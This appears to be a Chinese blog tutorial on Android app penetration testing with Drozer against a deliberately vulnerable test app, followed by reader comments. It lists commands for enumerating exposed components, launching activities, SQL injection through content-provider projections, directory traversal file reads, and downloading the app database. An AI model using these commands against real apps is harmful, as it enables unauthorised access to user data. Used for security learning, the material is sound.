AI智能摘要
你是否想过,一个看似无害的Android应用,竟可能暗藏信息泄露、SQL注入甚至远程代码执行的致命漏洞?本文带你手把手实战Drozer,从零开始挖掘App的暴露组件、绕过登录验证、读取敏感数据,直至发现SQL注入与目录遍历漏洞。无需猜测,全程真实操作演示,揭秘移动安全测试的核心逻辑与攻击路径。看完你也能独立完成一次完整的Android渗透测试。
— AI 生成的文章内容摘要
声明:本文全程采用测试app,根据相关法律法规严禁非法入侵他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动,窃取或者以其他非法方式获取个人信息。
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|


run app.package.list
run app.package.list -f sieve
run app.package.info -a 包名
run app.package.attacksurface 包名
run app.activity.info -a 包名
run app.activity.start–component 包名 组件名

run app.provider.info -a 包名
run scanner.provider.finduris -a 包名
run app.provider.query 查询到的URI
run app.provider.query URI --projection"* FROM SQLITE_MASTER WHERE type='table';--"
run app.provider.query URI --projection"* FROM 表名;--"
runscanner.provider.injection -a 包名
run scanner.provider.traversal -a 包名
run app.provider.read 遍历路径/文件路径
run app.provider.download 数据库URI 本地路径/备份文件名.db


上海市金山区 1F
这个测试app挺有意思的,回头也找个模拟器试试看。
日本 2F
SQL注入那块操作写得挺细的,跟着走了一遍,确实能读到数据。
贵州省贵阳市 3F
目录遍历那个漏洞有点吓人啊,直接能读到hosts文件。
日本 4F
新手问一下,除了夜神,别的模拟器能跑吗?🤔
广东省广州市 5F
搞了半天,最后那个数据库下载下来是啥格式的?.db文件直接能打开看?
河南省新乡市 B1
@ 绯红魔导士 数据库文件用SQLite浏览器就能打开,挺方便的。
甘肃省 6F
之前公司让做移动端安全自查,也用过drozer,配置环境有点烦人。
浙江省杭州市 7F
感觉内容提供者那块风险最大,一不留神就把用户数据漏出去了。
吉林省通化市 8F
看到SQL注入成功那段,确实有点小兴奋,哈哈。
北京市 9F
这种实战教程比光讲理论有用多了,至少知道工具咋用。
山东省菏泽市 10F
工具是好工具,就是不知道现在新版本的Android还有这么多漏洞不。
日本 11F
这个工具配置起来麻烦不?需要root权限吗?